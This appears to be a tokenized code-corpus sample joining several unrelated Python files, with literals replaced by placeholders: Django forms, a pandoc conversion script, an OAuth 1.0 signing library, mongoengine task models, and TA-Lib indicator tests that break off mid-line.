<s> from django import forms <EOL> from hackday . users . models import User , UserProfile <EOL> from hackday . teams . models import Team <EOL> from hackday . voting . moremodels import Category , TYPE <EOL> class UserChoiceField ( forms . ModelChoiceField ) : <EOL> def label_from_instance ( self , user ) : <EOL> return "<STR_LIT>" . format ( user . first_name , user . last_name ) <EOL> class UserMultipleChoiceField ( forms . ModelMultipleChoiceField ) : <EOL> def label_from_instance ( self , user ) : <EOL> return "<STR_LIT>" . format ( user . first_name , user . last_name ) <EOL> class BaseTeamForm ( forms . ModelForm ) : <EOL> captain = UserChoiceField ( queryset = User . objects . filter ( <EOL> is_active = True ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> members = UserMultipleChoiceField ( queryset = User . objects . filter ( <EOL> is_active = True ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> category = forms . ModelChoiceField ( queryset = Category . objects . filter ( <EOL> type = TYPE . JUDGED ) . order_by ( "<STR_LIT:name>" ) ) <EOL> class Meta : <EOL> model = Team <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ) <EOL> abstract = True <EOL> class CreateTeamForm ( BaseTeamForm ) : <EOL> pass <EOL> class UpdateTeamForm ( BaseTeamForm ) : <EOL> pass </s>
<s> import pandoc <EOL> import os <EOL> pandoc . core . PANDOC_PATH = '<STR_LIT>' <EOL> doc = pandoc . Document ( ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> doc . markdown = f . read ( ) <EOL> f = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> f . write ( doc . rst ) <EOL> f . close ( ) <EOL> os . system ( '<STR_LIT>' ) <EOL> os . remove ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import urllib <EOL> import time <EOL> import random <EOL> import urlparse <EOL> import hmac <EOL> import binascii <EOL> import httplib2 <EOL> try : <EOL> from urlparse import parse_qs , parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qs , parse_qsl <EOL> VERSION = '<STR_LIT:1.0>' <EOL> HTTP_METHOD = '<STR_LIT:GET>' <EOL> SIGNATURE_METHOD = '<STR_LIT>' <EOL> class Error ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = '<STR_LIT>' ) : <EOL> self . _message = message <EOL> @ property <EOL> def message ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _message <EOL> def __str__ ( self ) : <EOL> return self . _message <EOL> class MissingSignature ( Error ) : <EOL> pass <EOL> def build_authenticate_header ( realm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : '<STR_LIT>' % realm } <EOL> def escape ( s ) : <EOL> """<STR_LIT>""" <EOL> return urllib . quote ( s , safe = '<STR_LIT>' ) <EOL> def generate_timestamp ( ) : <EOL> """<STR_LIT>""" <EOL> return int ( time . time ( ) ) <EOL> def generate_nonce ( length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( [ str ( random . randint ( <NUM_LIT:0> , <NUM_LIT:9> ) ) for i in range ( length ) ] ) <EOL> def generate_verifier ( length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( [ str ( random . randint ( <NUM_LIT:0> , <NUM_LIT:9> ) ) for i in range ( length ) ] ) <EOL> class Consumer ( object ) : <EOL> """<STR_LIT>""" <EOL> key = None <EOL> secret = None <EOL> def __init__ ( self , key , secret ) : <EOL> self . key = key <EOL> self . secret = secret <EOL> if self . key is None or self . secret is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : self . key , <EOL> '<STR_LIT>' : self . secret <EOL> } <EOL> return urllib . urlencode ( data ) <EOL> class Token ( object ) : <EOL> """<STR_LIT>""" <EOL> key = None <EOL> secret = None <EOL> callback = None <EOL> callback_confirmed = None <EOL> verifier = None <EOL> def __init__ ( self , key , secret ) : <EOL> self . key = key <EOL> self . secret = secret <EOL> if self . key is None or self . secret is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def set_callback ( self , callback ) : <EOL> self . callback = callback <EOL> self . callback_confirmed = '<STR_LIT:true>' <EOL> def set_verifier ( self , verifier = None ) : <EOL> if verifier is not None : <EOL> self . verifier = verifier <EOL> else : <EOL> self . verifier = generate_verifier ( ) <EOL> def get_callback_url ( self ) : <EOL> if self . callback and self . verifier : <EOL> parts = urlparse . urlparse ( self . callback ) <EOL> scheme , netloc , path , params , query , fragment = parts [ : <NUM_LIT:6> ] <EOL> if query : <EOL> query = '<STR_LIT>' % ( query , self . verifier ) <EOL> else : <EOL> query = '<STR_LIT>' % self . verifier <EOL> return urlparse . urlunparse ( ( scheme , netloc , path , params , <EOL> query , fragment ) ) <EOL> return self . callback <EOL> def to_string ( self ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> '<STR_LIT>' : self . key , <EOL> '<STR_LIT>' : self . secret , <EOL> } <EOL> if self . callback_confirmed is not None : <EOL> data [ '<STR_LIT>' ] = self . callback_confirmed <EOL> return urllib . urlencode ( data ) <EOL> @ staticmethod <EOL> def from_string ( s ) : <EOL> """<STR_LIT>""" <EOL> if not len ( s ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> params = parse_qs ( s , keep_blank_values = False ) <EOL> if not len ( params ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> key = params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except Exception : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> secret = params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except Exception : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> token = Token ( key , secret ) <EOL> try : <EOL> token . callback_confirmed = params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> return token <EOL> def __str__ ( self ) : <EOL> return self . to_string ( ) <EOL> def setter ( attr ) : <EOL> name = attr . __name__ <EOL> def getter ( self ) : <EOL> try : <EOL> return self . __dict__ [ name ] <EOL> except KeyError : <EOL> raise AttributeError ( name ) <EOL> def deleter ( self ) : <EOL> del self . __dict__ [ name ] <EOL> return property ( getter , attr , deleter ) <EOL> class Request ( dict ) : <EOL> """<STR_LIT>""" <EOL> version = VERSION <EOL> def __init__ ( self , method = HTTP_METHOD , url = None , parameters = None ) : <EOL> self . method = method <EOL> self . url = url <EOL> if parameters is not None : <EOL> self . update ( parameters ) <EOL> @ setter <EOL> def url ( self , value ) : <EOL> self . __dict__ [ '<STR_LIT:url>' ] = value <EOL> if value is not None : <EOL> scheme , netloc , path , params , query , fragment = urlparse . urlparse ( value ) <EOL> if scheme == '<STR_LIT:http>' and netloc [ - <NUM_LIT:3> : ] == '<STR_LIT>' : <EOL> netloc = netloc [ : - <NUM_LIT:3> ] <EOL> elif scheme == '<STR_LIT>' and netloc [ - <NUM_LIT:4> : ] == '<STR_LIT>' : <EOL> netloc = netloc [ : - <NUM_LIT:4> ] <EOL> if scheme not in ( '<STR_LIT:http>' , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" % ( value , scheme ) ) <EOL> self . normalized_url = urlparse . urlunparse ( ( scheme , netloc , path , None , None , None ) ) <EOL> else : <EOL> self . normalized_url = None <EOL> self . __dict__ [ '<STR_LIT:url>' ] = None <EOL> @ setter <EOL> def method ( self , value ) : <EOL> self . __dict__ [ '<STR_LIT>' ] = value . upper ( ) <EOL> def _get_timestamp_nonce ( self ) : <EOL> return self [ '<STR_LIT>' ] , self [ '<STR_LIT>' ] <EOL> def get_nonoauth_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( [ ( k , v ) for k , v in self . iteritems ( ) <EOL> if not k . startswith ( '<STR_LIT>' ) ] ) <EOL> def to_header ( self , realm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> oauth_params = ( ( k , v ) for k , v in self . items ( ) <EOL> if k . startswith ( '<STR_LIT>' ) ) <EOL> stringy_params = ( ( k , escape ( str ( v ) ) ) for k , v in oauth_params ) <EOL> header_params = ( '<STR_LIT>' % ( k , v ) for k , v in stringy_params ) <EOL> params_header = '<STR_LIT:U+002CU+0020>' . join ( header_params ) <EOL> auth_header = '<STR_LIT>' % realm <EOL> if params_header : <EOL> auth_header = "<STR_LIT>" % ( auth_header , params_header ) <EOL> return { '<STR_LIT>' : auth_header } <EOL> def to_postdata ( self ) : <EOL> """<STR_LIT>""" <EOL> return urllib . urlencode ( self , True ) <EOL> def to_url ( self ) : <EOL> """<STR_LIT>""" <EOL> base_url = urlparse . urlparse ( self . url ) <EOL> query = parse_qs ( base_url . query ) <EOL> for k , v in self . items ( ) : <EOL> query . setdefault ( k , [ ] ) . append ( v ) <EOL> url = ( base_url . scheme , base_url . netloc , base_url . path , base_url . params , <EOL> urllib . urlencode ( query , True ) , base_url . fragment ) <EOL> return urlparse . urlunparse ( url ) <EOL> def get_parameter ( self , parameter ) : <EOL> ret = self . get ( parameter ) <EOL> if ret is None : <EOL> raise Error ( '<STR_LIT>' % parameter ) <EOL> return ret <EOL> def get_normalized_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> for key , value in self . iteritems ( ) : <EOL> if key == '<STR_LIT>' : <EOL> continue <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> items . extend ( ( key , item ) for item in value ) <EOL> else : <EOL> items . append ( ( key , value ) ) <EOL> query = urlparse . urlparse ( self . url ) [ <NUM_LIT:4> ] <EOL> items . extend ( self . _split_url_string ( query ) . items ( ) ) <EOL> encoded_str = urllib . urlencode ( sorted ( items ) ) <EOL> return encoded_str . replace ( '<STR_LIT:+>' , '<STR_LIT>' ) <EOL> def sign_request ( self , signature_method , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in self : <EOL> self [ '<STR_LIT>' ] = consumer . key <EOL> if token and '<STR_LIT>' not in self : <EOL> self [ '<STR_LIT>' ] = token . key <EOL> self [ '<STR_LIT>' ] = signature_method . name <EOL> self [ '<STR_LIT>' ] = signature_method . sign ( self , consumer , token ) <EOL> @ classmethod <EOL> def make_timestamp ( cls ) : <EOL> """<STR_LIT>""" <EOL> return str ( int ( time . time ( ) ) ) <EOL> @ classmethod <EOL> def make_nonce ( cls ) : <EOL> """<STR_LIT>""" <EOL> return str ( random . randint ( <NUM_LIT:0> , <NUM_LIT> ) ) <EOL> @ classmethod <EOL> def from_request ( cls , http_method , http_url , headers = None , parameters = None , <EOL> query_string = None ) : <EOL> """<STR_LIT>""" <EOL> if parameters is None : <EOL> parameters = { } <EOL> if headers and '<STR_LIT>' in headers : <EOL> auth_header = headers [ '<STR_LIT>' ] <EOL> if auth_header [ : <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> auth_header = auth_header [ <NUM_LIT:6> : ] <EOL> try : <EOL> header_params = cls . _split_header ( auth_header ) <EOL> parameters . update ( header_params ) <EOL> except : <EOL> raise Error ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if query_string : <EOL> query_params = cls . _split_url_string ( query_string ) <EOL> parameters . update ( query_params ) <EOL> param_str = urlparse . urlparse ( http_url ) [ <NUM_LIT:4> ] <EOL> url_params = cls . _split_url_string ( param_str ) <EOL> parameters . update ( url_params ) <EOL> if parameters : <EOL> return cls ( http_method , http_url , parameters ) <EOL> return None <EOL> @ classmethod <EOL> def from_consumer_and_token ( cls , consumer , token = None , <EOL> http_method = HTTP_METHOD , http_url = None , parameters = None ) : <EOL> if not parameters : <EOL> parameters = { } <EOL> defaults = { <EOL> '<STR_LIT>' : consumer . key , <EOL> '<STR_LIT>' : cls . make_timestamp ( ) , <EOL> '<STR_LIT>' : cls . make_nonce ( ) , <EOL> '<STR_LIT>' : cls . version , <EOL> } <EOL> defaults . update ( parameters ) <EOL> parameters = defaults <EOL> if token : <EOL> parameters [ '<STR_LIT>' ] = token . key <EOL> if token . verifier : <EOL> parameters [ '<STR_LIT>' ] = token . verifier <EOL> return Request ( http_method , http_url , parameters ) <EOL> @ classmethod <EOL> def from_token_and_callback ( cls , token , callback = None , <EOL> http_method = HTTP_METHOD , http_url = None , parameters = None ) : <EOL> if not parameters : <EOL> parameters = { } <EOL> parameters [ '<STR_LIT>' ] = token . key <EOL> if callback : <EOL> parameters [ '<STR_LIT>' ] = callback <EOL> return cls ( http_method , http_url , parameters ) <EOL> @ staticmethod <EOL> def _split_header ( header ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> parts = header . split ( '<STR_LIT:U+002C>' ) <EOL> for param in parts : <EOL> if param . find ( '<STR_LIT>' ) > - <NUM_LIT:1> : <EOL> continue <EOL> param = param . strip ( ) <EOL> param_parts = param . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> params [ param_parts [ <NUM_LIT:0> ] ] = urllib . unquote ( param_parts [ <NUM_LIT:1> ] . strip ( '<STR_LIT>' ) ) <EOL> return params <EOL> @ staticmethod <EOL> def _split_url_string ( param_str ) : <EOL> """<STR_LIT>""" <EOL> parameters = parse_qs ( param_str , keep_blank_values = False ) <EOL> for k , v in parameters . iteritems ( ) : <EOL> parameters [ k ] = urllib . unquote ( v [ <NUM_LIT:0> ] ) <EOL> return parameters <EOL> class Server ( object ) : <EOL> """<STR_LIT>""" <EOL> timestamp_threshold = <NUM_LIT> <EOL> version = VERSION <EOL> signature_methods = None <EOL> def __init__ ( self , signature_methods = None ) : <EOL> self . signature_methods = signature_methods or { } <EOL> def add_signature_method ( self , signature_method ) : <EOL> self . signature_methods [ signature_method . name ] = signature_method <EOL> return self . signature_methods <EOL> def verify_request ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> version = self . _get_version ( request ) <EOL> self . _check_signature ( request , consumer , token ) <EOL> parameters = request . get_nonoauth_parameters ( ) <EOL> return parameters <EOL> def build_authenticate_header ( self , realm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : '<STR_LIT>' % realm } <EOL> def _get_version ( self , request ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> version = request . get_parameter ( '<STR_LIT>' ) <EOL> except : <EOL> version = VERSION <EOL> if version and version != self . version : <EOL> raise Error ( '<STR_LIT>' % str ( version ) ) <EOL> return version <EOL> def _get_signature_method ( self , request ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> signature_method = request . get_parameter ( '<STR_LIT>' ) <EOL> except : <EOL> signature_method = SIGNATURE_METHOD <EOL> try : <EOL> signature_method = self . signature_methods [ signature_method ] <EOL> except : <EOL> signature_method_names = '<STR_LIT:U+002CU+0020>' . join ( self . signature_methods . keys ( ) ) <EOL> raise Error ( '<STR_LIT>' % ( signature_method , signature_method_names ) ) <EOL> return signature_method <EOL> def _get_verifier ( self , request ) : <EOL> return request . get_parameter ( '<STR_LIT>' ) <EOL> def _check_signature ( self , request , consumer , token ) : <EOL> timestamp , nonce = request . _get_timestamp_nonce ( ) <EOL> self . _check_timestamp ( timestamp ) <EOL> signature_method = self . _get_signature_method ( request ) <EOL> try : <EOL> signature = request . get_parameter ( '<STR_LIT>' ) <EOL> except : <EOL> raise MissingSignature ( '<STR_LIT>' ) <EOL> valid = signature_method . check ( request , consumer , token , signature ) <EOL> if not valid : <EOL> key , base = signature_method . signing_base ( request , consumer , token ) <EOL> raise Error ( '<STR_LIT>' <EOL> '<STR_LIT>' % base ) <EOL> built = signature_method . sign ( request , consumer , token ) <EOL> def _check_timestamp ( self , timestamp ) : <EOL> """<STR_LIT>""" <EOL> timestamp = int ( timestamp ) <EOL> now = int ( time . time ( ) ) <EOL> lapsed = now - timestamp <EOL> if lapsed > self . timestamp_threshold : <EOL> raise Error ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( timestamp , now , self . timestamp_threshold ) ) <EOL> class Client ( httplib2 . Http ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , consumer , token = None , cache = None , timeout = None , <EOL> proxy_info = None ) : <EOL> if consumer is not None and not isinstance ( consumer , Consumer ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if token is not None and not isinstance ( token , Token ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . consumer = consumer <EOL> self . token = token <EOL> self . method = SignatureMethod_HMAC_SHA1 ( ) <EOL> httplib2 . Http . __init__ ( self , cache = cache , timeout = timeout , <EOL> proxy_info = proxy_info ) <EOL> def set_signature_method ( self , method ) : <EOL> if not isinstance ( method , SignatureMethod ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . method = method <EOL> def request ( self , uri , method = "<STR_LIT:GET>" , body = None , headers = None , <EOL> redirections = httplib2 . DEFAULT_MAX_REDIRECTS , connection_type = None ) : <EOL> DEFAULT_CONTENT_TYPE = '<STR_LIT>' <EOL> if not isinstance ( headers , dict ) : <EOL> headers = { } <EOL> is_multipart = method == '<STR_LIT:POST>' and headers . get ( '<STR_LIT:Content-Type>' , DEFAULT_CONTENT_TYPE ) != DEFAULT_CONTENT_TYPE <EOL> if body and method == "<STR_LIT:POST>" and not is_multipart : <EOL> parameters = dict ( parse_qsl ( body ) ) <EOL> else : <EOL> parameters = None <EOL> req = Request . from_consumer_and_token ( self . consumer , token = self . token , <EOL> http_method = method , http_url = uri , parameters = parameters ) <EOL> req . sign_request ( self . method , self . consumer , self . token ) <EOL> if method == "<STR_LIT:POST>" : <EOL> headers [ '<STR_LIT:Content-Type>' ] = headers . get ( '<STR_LIT:Content-Type>' , DEFAULT_CONTENT_TYPE ) <EOL> if is_multipart : <EOL> headers . update ( req . to_header ( ) ) <EOL> else : <EOL> body = req . to_postdata ( ) <EOL> elif method == "<STR_LIT:GET>" : <EOL> uri = req . to_url ( ) <EOL> else : <EOL> headers . update ( req . to_header ( ) ) <EOL> return httplib2 . Http . request ( self , uri , method = method , body = body , <EOL> headers = headers , redirections = redirections , <EOL> connection_type = connection_type ) <EOL> class SignatureMethod ( object ) : <EOL> """<STR_LIT>""" <EOL> def signing_base ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def sign ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def check ( self , request , consumer , token , signature ) : <EOL> """<STR_LIT>""" <EOL> built = self . sign ( request , consumer , token ) <EOL> return built == signature <EOL> class SignatureMethod_HMAC_SHA1 ( SignatureMethod ) : <EOL> name = '<STR_LIT>' <EOL> def signing_base ( self , request , consumer , token ) : <EOL> sig = ( <EOL> escape ( request . method ) , <EOL> escape ( request . normalized_url ) , <EOL> escape ( request . get_normalized_parameters ( ) ) , <EOL> ) <EOL> key = '<STR_LIT>' % escape ( consumer . secret ) <EOL> if token : <EOL> key += escape ( token . secret ) <EOL> raw = '<STR_LIT:&>' . join ( sig ) <EOL> return key , raw <EOL> def sign ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> key , raw = self . signing_base ( request , consumer , token ) <EOL> try : <EOL> from hashlib import sha1 as sha <EOL> except ImportError : <EOL> import sha <EOL> hashed = hmac . new ( key , raw , sha ) <EOL> return binascii . b2a_base64 ( hashed . digest ( ) ) [ : - <NUM_LIT:1> ] <EOL> class SignatureMethod_PLAINTEXT ( SignatureMethod ) : <EOL> name = '<STR_LIT>' <EOL> def signing_base ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> sig = '<STR_LIT>' % escape ( consumer . secret ) <EOL> if token : <EOL> sig = sig + escape ( token . secret ) <EOL> return sig , sig <EOL> def sign ( self , request , consumer , token ) : <EOL> key , raw = self . signing_base ( request , consumer , token ) <EOL> return raw </s>
<s> from __future__ import unicode_literals <EOL> import six <EOL> from flask . ext . mongoengine import Document <EOL> from mongoengine import ( <EOL> BooleanField , <EOL> CASCADE , <EOL> DateTimeField , <EOL> DictField , <EOL> IntField , <EOL> ListField , <EOL> ReferenceField , <EOL> StringField <EOL> ) <EOL> from vulyk . models . user import User <EOL> class Batch ( Document ) : <EOL> id = StringField ( max_length = <NUM_LIT:50> , primary_key = True ) <EOL> task_type = StringField ( max_length = <NUM_LIT:50> , required = True , db_field = '<STR_LIT>' ) <EOL> tasks_count = IntField ( default = <NUM_LIT:0> , required = True , db_field = '<STR_LIT>' ) <EOL> tasks_processed = IntField ( default = <NUM_LIT:0> , db_field = '<STR_LIT>' ) <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> def __unicode__ ( self ) : <EOL> return six . text_type ( self . id ) <EOL> def __str__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> class AbstractTask ( Document ) : <EOL> """<STR_LIT>""" <EOL> id = StringField ( max_length = <NUM_LIT:200> , default = '<STR_LIT>' , primary_key = True ) <EOL> task_type = StringField ( max_length = <NUM_LIT:50> , required = True , db_field = '<STR_LIT>' ) <EOL> batch = ReferenceField ( Batch , reverse_delete_rule = CASCADE ) <EOL> users_count = IntField ( default = <NUM_LIT:0> , db_field = '<STR_LIT>' ) <EOL> users_processed = ListField ( ReferenceField ( User ) , <EOL> db_field = '<STR_LIT>' ) <EOL> users_skipped = ListField ( ReferenceField ( User ) , db_field = '<STR_LIT>' ) <EOL> closed = BooleanField ( default = False ) <EOL> task_data = DictField ( required = True ) <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> def as_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT:id>' : self . id , <EOL> '<STR_LIT>' : self . closed , <EOL> '<STR_LIT:data>' : self . task_data <EOL> } <EOL> def __unicode__ ( self ) : <EOL> return six . text_type ( self . id ) <EOL> def __str__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> class AbstractAnswer ( Document ) : <EOL> """<STR_LIT>""" <EOL> task = ReferenceField ( AbstractTask , reverse_delete_rule = CASCADE ) <EOL> created_by = ReferenceField ( User , reverse_delete_rule = CASCADE , <EOL> db_field = '<STR_LIT>' ) <EOL> created_at = DateTimeField ( db_field = '<STR_LIT>' ) <EOL> task_type = StringField ( max_length = <NUM_LIT:50> , required = True , db_field = '<STR_LIT>' ) <EOL> result = DictField ( ) <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> @ property <EOL> def corrections ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> @ corrections . setter <EOL> def corrections ( self , value ) : <EOL> pass <EOL> @ corrections . deleter <EOL> def corrections ( self ) : <EOL> pass <EOL> def as_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : self . task . as_dict ( ) , <EOL> '<STR_LIT>' : self . result , <EOL> '<STR_LIT:user>' : self . created_by . as_dict ( ) <EOL> } <EOL> def __unicode__ ( self ) : <EOL> return six . text_type ( self . pk ) <EOL> def __str__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . created_by , self . task ) </s>
<s> import numpy as np <EOL> from nose . tools import assert_equals , assert_true , assert_raises <EOL> import talib <EOL> from talib import func <EOL> from talib . test_data import series , assert_np_arrays_equal , assert_np_arrays_not_equal <EOL> def test_input_lengths ( ) : <EOL> a1 = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> a2 = np . arange ( <NUM_LIT:11> , dtype = float ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a2 , a1 , a1 , a1 ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a1 , a2 , a1 , a1 ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a1 , a1 , a2 , a1 ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a1 , a1 , a1 , a2 ) <EOL> def test_input_nans ( ) : <EOL> a1 = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> a2 = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> a2 [ <NUM_LIT:0> ] = np . nan <EOL> a2 [ <NUM_LIT:1> ] = np . nan <EOL> r1 , r2 = func . AROON ( a1 , a2 , <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( r1 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> assert_np_arrays_equal ( r2 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> ] ) <EOL> r1 , r2 = func . AROON ( a2 , a1 , <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( r1 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> assert_np_arrays_equal ( r2 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> ] ) <EOL> def test_unstable_period ( ) : <EOL> a = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> r = func . EMA ( a , <NUM_LIT:3> ) <EOL> assert_np_arrays_equal ( r , [ np . nan , np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] ) <EOL> talib . set_unstable_period ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> r = func . EMA ( a , <NUM_LIT:3> ) <EOL> assert_np_arrays_equal ( r , [ np . nan , np . nan , np . nan , np . nan , np . nan , np . nan , np . nan , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] ) <EOL> talib . set_unstable_period ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> def test_MIN ( ) : <EOL> result = func . MIN ( series , timeperiod = <NUM_LIT:4> ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_equals ( len ( series ) , len ( result ) ) <EOL> assert_equals ( result [ i + <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:3> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:4> ] , <NUM_LIT> ) <EOL> values = np . array ( [ np . nan , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> result = func . MIN ( values , timeperiod = <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> def test_MAX ( ) : <EOL> result = func . MAX ( series , timeperiod = <NUM_LIT:4> ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_equals ( len ( series ) , len ( result ) ) <EOL> assert_equals ( result [ i + <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:3> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:4> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:5> ] , <NUM_LIT> ) <EOL> def test_MOM ( ) : <EOL> values = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:1> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , - <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , - <NUM_LIT:1> ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:3> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , np . nan ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:4> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , np . nan ] ) <EOL> def test_BBANDS ( ) : <EOL> upper , middle , lower = func . BBANDS ( series , timeperiod = <NUM_LIT:20> , <EOL> nbdevup = <NUM_LIT> , nbdevdn = <NUM_LIT> , <EOL> matype = talib . MA_Type . EMA ) <EOL> i = np . where ( ~ np . isnan ( upper ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_true ( len ( upper ) == len ( middle ) == len ( lower ) == len ( series ) ) <EOL> assert_true ( abs ( middle [ i + <NUM_LIT:0> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( lower [ i + <NUM_LIT:0> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( middle [ i + <NUM_LIT> ] - 